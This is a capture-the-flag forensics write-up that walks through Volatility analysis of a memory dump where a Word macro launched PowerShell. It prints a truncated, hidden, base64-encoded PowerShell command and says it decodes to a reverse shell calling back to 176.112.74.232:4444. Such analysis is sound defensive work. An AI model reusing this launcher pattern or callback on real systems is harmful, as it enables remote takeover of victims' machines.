Reminiscent is an Easy-rated HackTheBox forensics challenge. A recruiter opened a malicious email attachment and infected their virtual machine. A memory dump was captured during the infection. The task is to reconstruct what happened and recover the flag.
Establishing the image profile
vol -f flounder-pc-memdump.elf windows.info
# Kernel: Windows 7 SP1 x64Process tree review
vol -f flounder-pc-memdump.elf windows.pstree
# Relevant excerpt:
# 2736 2608 WINWORD.EXE 2017-10-04 18:39:55
# ** 3180 2736 powershell.exe 2017-10-04 18:40:00Word spawning PowerShell is the classic macro execution chain. That parent-child relationship alone tells you the infection vector: a malicious Office document with an embedded macro. The recruiter opened a resume and the macro ran.
Extracting the PowerShell command
vol -f flounder-pc-memdump.elf windows.cmdline --pid 3180
# Output:
# 3180 powershell.exe -NoP -sta -NonI -W Hidden -Enc WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4A...Decoding the base64:
echo "WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4A..." | base64 -d | iconv -f utf-16le -t utf-8
# Sets TLS 1.2 then opens a TCP connection to 176.112.74.232:4444Standard PowerShell reverse shell phoning back to attacker infrastructure.
Recovering the malicious document
vol -f flounder-pc-memdump.elf windows.filescan | grep -i "resume\|\.docx"
# 0x000000013fc10070 \Users\user\Desktop\resume_scott.docx
vol -f flounder-pc-memdump.elf windows.dumpfiles --physaddr 0x000000013fc10070 -o /tmp/The flag is embedded in the recovered document metadata:
exiftool resume_scott.docx | grep -i "flag\|HTB"
# Subject: HTB{...}Key takeaway
Malicious email attachment to macro to PowerShell download cradle to reverse shell. A very common chain in real incidents. The memory artefacts here are extensive because the attacker did nothing to clean up. The Word to PowerShell parent-child relationship in the process tree is the first thing to look at and the base64 in the PowerShell arguments decodes to everything needed to understand the full attack chain.